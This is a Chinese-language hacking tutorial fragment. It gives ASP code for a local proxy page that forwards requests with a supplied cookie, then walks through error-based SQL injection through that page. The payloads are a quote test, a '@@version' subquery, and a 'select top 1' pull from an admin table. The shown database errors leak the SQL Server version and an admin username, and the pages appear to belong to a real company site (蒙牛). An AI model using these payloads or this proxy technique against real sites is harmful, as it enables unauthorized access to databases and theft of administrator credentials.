Function PostData(PostUrl,PostCok)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.SetRequestHeader "Cookie",PostCok
.Send
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
OK .我们来试试 http://localhost/f.asp?fk=11'
返回
> 企业文化> 蒙牛企业文化 > 错误:0x80040E14
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。
对了,这样就方便多了嘛..
继续试试?
f.asp?fk=11%20and%201=([email=select%20@@version]select%20@@version[/email])
企业文化> 蒙牛企业文化 > 错误:0x80040E07
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换为数据类型为 int 的列时发生语法错误。
中间省略.. http://localhost/f.asp?fk=11%20and%201=(select%20top%201%20SysU_Usernaem%20from%20sysa_admin)
> 企业文化> 蒙牛企业文化 > 错误:0x80040E07
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'admin' 转换为数据类型为 int 的列时发生语法错误。